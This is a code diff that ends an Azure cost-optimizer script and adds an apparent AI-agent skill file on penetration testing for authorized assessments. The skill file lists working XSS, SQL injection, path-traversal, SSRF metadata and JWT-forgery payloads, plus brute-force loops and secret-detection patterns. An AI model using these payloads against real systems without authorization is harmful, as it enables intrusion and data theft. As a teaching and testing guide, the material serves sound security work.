    def _top_priority(self) -> List[Dict[str, Any]]:
        high = [r for r in self.recommendations if r["priority"] == "high"]
        high.sort(key=lambda x: x.get("potential_savings_usd", 0), reverse=True)
        return high[:5]


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------

def _format_text(report: Dict[str, Any]) -> str:
    lines = []
    lines.append(f"Current Monthly Spend: ${report['current_monthly_usd']}")
    lines.append(f"Potential Savings: ${report['potential_monthly_savings_usd']} ({report['savings_percentage']}%)")
    lines.append(f"Optimized Spend: ${report['optimized_monthly_usd']}")
    lines.append("")

    lines.append("=== Priority Actions ===")
    for i, action in enumerate(report.get("priority_actions", []), 1):
        lines.append(f"  {i}. [{action['service']}] {action['recommendation']}")
        lines.append(f"     Savings: ${action.get('potential_savings_usd', 0)}")
    lines.append("")

    lines.append("=== All Recommendations ===")
    for rec in report.get("recommendations", []):
        lines.append(f"  [{rec['priority'].upper()}] {rec['service']} — {rec['type']}")
        lines.append(f"    Issue: {rec['issue']}")
        lines.append(f"    Action: {rec['recommendation']}")
        savings = rec.get("potential_savings_usd", 0)
        if savings:
            lines.append(f"    Savings: ${savings}")
        lines.append("")

    return "\n".join(lines)


def main():
    parser = argparse.ArgumentParser(
        description="Azure Cost Optimizer — analyze Azure resources and recommend cost savings.",
        epilog="Examples:\n"
               " python cost_optimizer.py --config resources.json\n"
               " python cost_optimizer.py --config resources.json --json",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument(
        "--config",
        required=True,
        help="Path to JSON file with current Azure resource inventory",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_output",
        help="Output as JSON instead of human-readable text",
    )

    args = parser.parse_args()

    try:
        with open(args.config, "r") as f:
            resources = json.load(f)
    except FileNotFoundError:
        print(f"Error: file not found: {args.config}", file=sys.stderr)
        sys.exit(1)
    except json.JSONDecodeError as exc:
        print(f"Error: invalid JSON in {args.config}: {exc}", file=sys.stderr)
        sys.exit(1)

    optimizer = AzureCostOptimizer(resources)
    report = optimizer.analyze()

    if args.json_output:
        print(json.dumps(report, indent=2))
    else:
        print(_format_text(report))


if __name__ == "__main__":
    main()
850
engineering-team/security-pen-testing/SKILL.md
Normal file
@@ -0,0 +1,850 @@
---
name: "security-pen-testing"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
---

# Security Penetration Testing

Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.

---
## Table of Contents

- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)

---
## Overview

### What This Skill Does

This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.

### Distinction from Other Security Skills

| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |

### Prerequisites

All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.

---
## OWASP Top 10 Systematic Audit

Use the vulnerability scanner tool for automated checklist generation:

```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full

# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```

### A01:2021 — Broken Access Control

**Test Procedures:**
1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens

**What to Look For:**
- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
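Procedure 1 above can be semi-automated. A minimal triage helper for classifying the result of an ID-swap probe (the function name and the interpretation thresholds are illustrative, not part of any scanner): fetch a resource you own, then a foreign ID with the same token, and compare.

```python
def idor_verdict(own_status: int, other_status: int, bodies_differ: bool) -> str:
    """Classify an IDOR probe: GET a resource we own with our token
    (own_status), then GET another user's resource with the SAME token
    (other_status). A 200 on the foreign resource is the finding."""
    if other_status in (401, 403, 404):
        return "access-control enforced"
    if own_status == 200 and other_status == 200 and bodies_differ:
        return "LIKELY IDOR: foreign resource returned 200"
    return "inconclusive: verify manually"
```

A 404 on the foreign ID is treated as enforcement here; some APIs deliberately return 404 instead of 403 to avoid confirming that the resource exists.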
### A02:2021 — Cryptographic Failures

**Test Procedures:**
1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)

**What to Look For:**
- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
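The first "What to Look For" bullet is easy to grep for. A rough static sweep, as a sketch only; real scanners like Semgrep add data-flow context to cut false positives:

```python
import re

# Flags calls such as hashlib.md5(...) or sha1(...). Review hits manually:
# MD5/SHA1 can be legitimate for non-security checksums.
WEAK_HASH = re.compile(r"\b(md5|sha1)\s*\(", re.IGNORECASE)

def find_weak_hashing(source: str) -> list[int]:
    """Return 1-based line numbers containing md5()/sha1() calls."""
    return [i for i, line in enumerate(source.splitlines(), 1)
            if WEAK_HASH.search(line)]
```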
### A03:2021 — Injection

**Test Procedures:**
1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`

**What to Look For:**
- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
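The classic `' OR 1=1--` payload from procedure 1 can be demonstrated end to end with an in-memory SQLite table (the schema is hypothetical): the concatenated query leaks every row, while the parameterized one treats the payload as a literal name.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "' OR 1=1--"

# Vulnerable: concatenation lets the payload rewrite the WHERE clause,
# so the query becomes ... WHERE name = '' OR 1=1 --' and matches every row.
vulnerable = conn.execute(
    "SELECT * FROM users WHERE name = '" + payload + "'"
).fetchall()

# Safe: the bound parameter is compared as the literal string "' OR 1=1--",
# which matches no user.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)
).fetchall()

# vulnerable contains the alice row; safe is empty.
```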
### A04:2021 — Insecure Design

**Test Procedures:**
1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable

**What to Look For:**
- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms
### A05:2021 — Security Misconfiguration

**Test Procedures:**
1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled

**What to Look For:**
- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
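Procedure 4 reduces to a set difference over response headers. A minimal checker (the required set below is a common baseline, not an exhaustive list):

```python
REQUIRED_HEADERS = {
    "content-security-policy",
    "x-frame-options",
    "x-content-type-options",
    "strict-transport-security",
}

def missing_security_headers(headers: dict[str, str]) -> set[str]:
    """Return baseline security headers absent from a response.
    Comparison is case-insensitive, as header names are."""
    present = {k.lower() for k in headers}
    return REQUIRED_HEADERS - present
```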
### A06:2021 — Vulnerable and Outdated Components

**Test Procedures:**
1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)

```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```
### A07:2021 — Identification and Authentication Failures

**Test Procedures:**
1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths

**What to Look For:**
- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
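The cookie-flag checks in procedure 4 can be run directly against a `Set-Cookie` header value. A small audit helper (function name is illustrative):

```python
def audit_session_cookie(set_cookie: str) -> list[str]:
    """Return missing security attributes on a Set-Cookie header value."""
    # Attributes follow the first "name=value" pair, separated by ";".
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    if "samesite" not in attrs:
        findings.append("missing SameSite")
    return findings
```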
### A08:2021 — Software and Data Integrity Failures

**Test Procedures:**
1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts

**What to Look For:**
- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes
### A09:2021 — Security Logging and Monitoring Failures

**Test Procedures:**
1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?

**What to Look For:**
- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection
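When procedure 2 turns up secrets in logs, the usual fix is a scrubbing filter in the logging pipeline. A sketch; the two patterns below are illustrative and real deployments need a larger, tuned set:

```python
import re

REDACTIONS = [
    # key=value leaks such as password=hunter2 or token=abc
    (re.compile(r"(password|passwd|secret|token)=\S+", re.IGNORECASE),
     r"\1=[REDACTED]"),
    # Authorization bearer tokens
    (re.compile(r"Bearer\s+[A-Za-z0-9._-]+"), "Bearer [REDACTED]"),
]

def scrub(line: str) -> str:
    """Redact known secret shapes from a log line before it is written."""
    for pattern, repl in REDACTIONS:
        line = pattern.sub(repl, line)
    return line
```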
### A10:2021 — Server-Side Request Forgery (SSRF)

**Test Procedures:**
1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests

**What to Look For:**
- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
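The allowlist validation from procedure 4 can be sketched in a few lines; the allowed hosts below are hypothetical placeholders:

```python
from ipaddress import ip_address
from urllib.parse import urlparse

ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}  # hypothetical allowlist

def is_safe_fetch_url(url: str) -> bool:
    """Allow only http(s) URLs whose host is on the allowlist, and never a
    raw IP, which blocks 169.254.169.254-style metadata probes outright."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = parsed.hostname or ""
    try:
        ip_address(host)
        return False  # raw IP literals are never allowed
    except ValueError:
        pass
    return host in ALLOWED_HOSTS
```

Note that a hostname check alone does not stop DNS rebinding (procedure 3); for that, resolve the host once, validate the resulting IP, and pin it for the actual request.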
---
## Static Analysis

### CodeQL Custom Rules

Write custom CodeQL queries for project-specific vulnerability patterns:

```ql
/**
 * Detect SQL injection via string concatenation
 */
import python
import semmle.python.dataflow.new.DataFlow

from Call call, StringFormatting fmt
where
  call.getFunc().getName() = "execute" and
  fmt = call.getArg(0) and
  exists(DataFlow::Node source |
    source.asExpr() instanceof Name and
    DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
  )
select call, "Potential SQL injection: user input flows into execute()"
```
### Semgrep Custom Rules

Create project-specific Semgrep rules:

```yaml
rules:
  - id: hardcoded-jwt-secret
    pattern: |
      jwt.encode($PAYLOAD, "...", ...)
    message: "JWT signed with hardcoded secret"
    severity: ERROR
    languages: [python]

  - id: unsafe-yaml-load
    pattern: yaml.load($DATA)
    fix: yaml.safe_load($DATA)
    message: "Use yaml.safe_load() to prevent arbitrary code execution"
    severity: WARNING
    languages: [python]

  - id: express-no-helmet
    pattern: |
      const app = express();
      ...
      app.listen(...)
    pattern-not: |
      const app = express();
      ...
      app.use(helmet(...));
      ...
      app.listen(...)
    message: "Express app missing helmet middleware for security headers"
    severity: WARNING
    languages: [javascript, typescript]
```
### ESLint Security Plugins

Recommended configuration:

```json
{
  "plugins": ["security", "no-unsanitized"],
  "extends": ["plugin:security/recommended"],
  "rules": {
    "security/detect-object-injection": "error",
    "security/detect-non-literal-regexp": "warn",
    "security/detect-unsafe-regex": "error",
    "security/detect-buffer-noassert": "error",
    "security/detect-eval-with-expression": "error",
    "no-unsanitized/method": "error",
    "no-unsanitized/property": "error"
  }
}
```

---
## Dependency Vulnerability Scanning

### Ecosystem-Specific Commands

```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'

# Python
pip-audit --format json --desc
safety check --json

# Go
govulncheck ./...

# Ruby
bundle audit check --update
```
### CVE Triage Workflow

1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files

```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```

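The deduplicate/score/prioritize steps can be sketched as a small helper (a minimal sketch; the finding fields `cve`, `cvss`, `exploitable`, and `reachable` mirror typical audit output and are assumptions, not the `dependency_auditor.py` schema):

```python
# Minimal CVE triage sketch: deduplicate by CVE ID, then sort so that
# critical + exploitable + reachable findings land at the top of the queue.
def triage(findings):
    by_cve = {}
    for f in findings:                      # deduplicate across direct/transitive deps
        by_cve.setdefault(f["cve"], f)
    def priority(f):
        # Higher CVSS first; exploitable and reachable break ties.
        return (-f["cvss"], not f.get("exploitable"), not f.get("reachable"))
    return sorted(by_cve.values(), key=priority)

findings = [
    {"cve": "CVE-2021-23337", "cvss": 7.2, "exploitable": False},
    {"cve": "CVE-2021-44228", "cvss": 10.0, "exploitable": True, "reachable": True},
    {"cve": "CVE-2021-44228", "cvss": 10.0, "exploitable": True, "reachable": True},
]
print([f["cve"] for f in triage(findings)])  # → ['CVE-2021-44228', 'CVE-2021-23337']
```
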
### Known Vulnerable Patterns

| Package | Vulnerable Versions | CVE | Impact |
|---------|---------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Command injection via template |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |

---

## Secret Scanning

### TruffleHog Patterns

```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json

# Scan filesystem (no git history)
trufflehog filesystem . --json
```

### Gitleaks Configuration

```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"

[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]

[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]

[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]

[allowlist]
paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```

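The rules above are plain regexes, so they are easy to sanity-check before committing the config. A minimal sketch of what gitleaks does per rule (real gitleaks also walks commits, applies the allowlist, and checks entropy):

```python
import re

# Apply the aws-access-key rule from the config above to a text blob.
AWS_KEY = re.compile(r"AKIA[0-9A-Z]{16}")

def scan(text):
    # Return every match so each hit can be reported with its location.
    return [m.group(0) for m in AWS_KEY.finditer(text)]

print(scan("aws_access_key_id = AKIAIOSFODNN7EXAMPLE"))  # → ['AKIAIOSFODNN7EXAMPLE']
```
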
### Pre-commit Hook Integration

```yaml
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks

  - repo: https://github.com/trufflesecurity/trufflehog
    rev: v3.63.0
    hooks:
      - id: trufflehog
        args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```

### CI Integration (GitHub Actions)

```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified
```

---

## API Security Testing

### Authentication Bypass

**JWT Manipulation:**

1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes

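Step 2 can be reproduced in a few lines (a test sketch for authorized targets only; the claims shown are illustrative). A correct verifier must reject a token like this; a vulnerable one accepts it:

```python
import base64, json

# Craft an unsigned "alg: none" token from tampered claims (JWT step 2 above).
def b64url(data: dict) -> str:
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

header = {"alg": "none", "typ": "JWT"}
claims = {"sub": "1234567890", "role": "admin", "exp": 9999999999}
token = f"{b64url(header)}.{b64url(claims)}."   # note the empty signature segment

print(token.endswith("."))  # → True
```
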
**Session Fixation:**

1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation

### Authorization Flaws

**IDOR (Insecure Direct Object Reference):**

```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
GET /api/users/124/profile → 403 (properly protected)
```

Test pattern: Change numeric IDs, UUIDs, slugs in every endpoint. Use Burp Intruder or a simple script to iterate.

**BOLA (Broken Object Level Authorization):**

Same as IDOR but specifically in REST APIs. Test every CRUD operation:

- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?

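The CRUD questions above are easy to automate with "a simple script to iterate". A sketch under stated assumptions — the endpoint paths and the captured user-A token are illustrative, and this must only run against systems you are authorized to test:

```python
import urllib.request, urllib.error

def is_finding(status: int) -> bool:
    # Any status other than an auth/not-found denial means user A reached user B's resource.
    return status not in (401, 403, 404)

def probe(base, token_a, b_id):
    # Replay the CRUD matrix with user A's token against user B's identifiers.
    findings = []
    for method, path in [("GET", f"/api/users/{b_id}/profile"),
                         ("PUT", f"/api/users/{b_id}/settings"),
                         ("DELETE", f"/api/comments/{b_id}")]:
        req = urllib.request.Request(base + path, method=method,
                                     headers={"Authorization": f"Bearer {token_a}"})
        try:
            status = urllib.request.urlopen(req, timeout=10).status
        except urllib.error.HTTPError as exc:
            status = exc.code
        if is_finding(status):
            findings.append((method, path, status))
    return findings

print(is_finding(200), is_finding(403))  # → True False
```
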
**BFLA (Broken Function Level Authorization):**

```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```

### Rate Limiting Validation

Test rate limits on critical endpoints:
```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -X POST https://target.com/api/login \
    -H "Content-Type: application/json" \
    -d '{"email":"test@test.com","password":"wrong"}'
done
# Expect: 429 after threshold (typically 5-10 attempts)
```

### Mass Assignment Detection

```
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
  "name": "Normal User",
  "email": "user@test.com",
  "role": "admin",              # mass assignment attempt
  "is_verified": true,          # mass assignment attempt
  "subscription": "enterprise"  # mass assignment attempt
}
```

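The server-side fix is an explicit allow-list of client-settable fields. A minimal sketch (the field names are the illustrative ones from the request above, not a real framework API):

```python
# Strip any field the client may not set; only allow-listed keys survive.
ALLOWED_PROFILE_FIELDS = {"name", "email"}

def filter_update(payload: dict) -> dict:
    return {k: v for k, v in payload.items() if k in ALLOWED_PROFILE_FIELDS}

attempt = {"name": "Normal User", "email": "user@test.com",
           "role": "admin", "is_verified": True}
print(filter_update(attempt))  # → {'name': 'Normal User', 'email': 'user@test.com'}
```
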
### GraphQL-Specific Testing

**Introspection Query:**

```graphql
{
  __schema {
    types { name fields { name type { name } } }
  }
}
```

Introspection should be **disabled in production**.

**Query Depth Attack:**

```graphql
{
  user(id: 1) {
    friends {
      friends {
        friends {
          friends {  # Keep nesting until server crashes
            name
          }
        }
      }
    }
  }
}
```

**Batching Attack:**

```json
[
  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```

Batch mutations can bypass rate limiting if counted as a single request.

---

## Web Vulnerability Testing

### XSS (Cross-Site Scripting)

**Reflected XSS Test Payloads** (non-destructive):

```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```

**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check if they render for other users.

**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.

### CSRF Token Validation

1. Capture a legitimate request that includes its CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check if the token changes per request or is static per session
5. Verify the `SameSite` cookie attribute is set to `Strict` or `Lax`

### SQL Injection

**Detection Payloads** (safe, non-destructive):

```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)--    (time-based blind)
' AND 1=1--         (boolean-based blind)
```

**Union-Based Enumeration** (authorized testing only):

```sql
' UNION SELECT 1,2,3--    -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```

**Time-Based Blind:**

```sql
' AND IF(1=1, SLEEP(5), 0)--    -- MySQL
' AND pg_sleep(5)--             -- PostgreSQL
' WAITFOR DELAY '0:0:5'--       -- MSSQL
```

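Time-based payloads are confirmed by comparing response latencies: if the sleep payload is consistently slower than a control value, the input is reaching the SQL engine. A minimal timing harness, where `send()` stands in for the actual HTTP request (an assumption; authorized targets only):

```python
import time

# Confirm time-based blind injection by latency delta: the SLEEP(5) payload
# should take roughly the sleep duration longer than the control request.
def looks_time_blind(send, control="1", payload="1' AND SLEEP(5)-- ", threshold=4.0):
    t0 = time.monotonic(); send(control); base = time.monotonic() - t0
    t1 = time.monotonic(); send(payload); delayed = time.monotonic() - t1
    return (delayed - base) > threshold

# Simulated target for illustration: delays only when the payload reaches "SQL".
def fake_send(value):
    if "SLEEP" in value:
        time.sleep(0.2)

print(looks_time_blind(fake_send, threshold=0.1))  # → True
```
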
### SSRF Detection

**Payloads for SSRF testing:**

```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/   (AWS metadata)
http://metadata.google.internal/           (GCP metadata)
http://169.254.169.254/metadata/instance   (Azure metadata)
http://[::1]                               (IPv6 localhost)
http://0x7f000001                          (hex encoding)
http://2130706433                          (decimal encoding)
```

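The hex and decimal forms both decode back to 127.0.0.1, which is why SSRF filters must normalize the host before comparing against a blocklist. A quick check with the standard library:

```python
import ipaddress

# 0x7f000001 and 2130706433 are integer encodings of 127.0.0.1 —
# naive string blocklists miss them unless the URL host is normalized first.
print(ipaddress.ip_address(0x7f000001))  # → 127.0.0.1
print(ipaddress.ip_address(2130706433))  # → 127.0.0.1
```
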
### Path Traversal

```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd   (double encoding)
```

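The corresponding server-side defense resolves the requested path and verifies it stays inside the content root. A minimal sketch using the standard library (the base directory is a placeholder; POSIX paths assumed):

```python
import os.path

# Reject any request whose resolved path escapes the allowed base directory.
def safe_join(base, name):
    candidate = os.path.realpath(os.path.join(base, name))
    base_real = os.path.realpath(base)
    return candidate if candidate.startswith(base_real + os.sep) else None

print(safe_join("/srv/files", "report.txt"))        # → /srv/files/report.txt
print(safe_join("/srv/files", "../../etc/passwd"))  # → None
```
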
---

## Infrastructure Security

### Misconfigured Cloud Storage

**S3 Bucket Checks:**

```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request

# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket

# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```

**Common Bucket Name Patterns:**

```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```

### HTTP Security Headers

Required headers and expected values:

| Header | Expected Value |
|--------|----------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |

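The table can be checked programmatically. A minimal sketch as a pure function over a parsed header dict, so it composes with any HTTP client (the subset of headers checked and the "present is enough" rule for HSTS are simplifying assumptions):

```python
REQUIRED = {
    "strict-transport-security": None,          # presence check only, in this sketch
    "x-content-type-options": "nosniff",
    "x-frame-options": ("DENY", "SAMEORIGIN"),
    "referrer-policy": "strict-origin-when-cross-origin",
}

def missing_headers(headers):
    # Case-insensitive lookup; report headers that are absent or wrong-valued.
    lower = {k.lower(): v for k, v in headers.items()}
    bad = []
    for name, expected in REQUIRED.items():
        value = lower.get(name)
        if value is None:
            bad.append(name)
        elif isinstance(expected, tuple) and value not in expected:
            bad.append(name)
        elif isinstance(expected, str) and value != expected:
            bad.append(name)
    return bad

print(missing_headers({"X-Frame-Options": "DENY",
                       "X-Content-Type-Options": "nosniff"}))
```
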
### TLS Configuration

```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com

# Quick check with testssl.sh
./testssl.sh target.com

# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```

**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.

### Open Port Scanning

```bash
# Quick top-1000 ports
nmap -sV target.com

# Full port scan
nmap -p- -sV target.com

# Common dangerous open ports:
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```

---

## Pen Test Report Generation

Generate professional reports from structured findings:

```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md

# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```

### Findings JSON Format

```json
[
  {
    "title": "SQL Injection in Login Endpoint",
    "severity": "critical",
    "cvss_score": 9.8,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    "category": "A03:2021 - Injection",
    "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
    "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
    "impact": "Full database access, authentication bypass, potential remote code execution",
    "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
    "references": ["https://cwe.mitre.org/data/definitions/89.html"]
  }
]
```

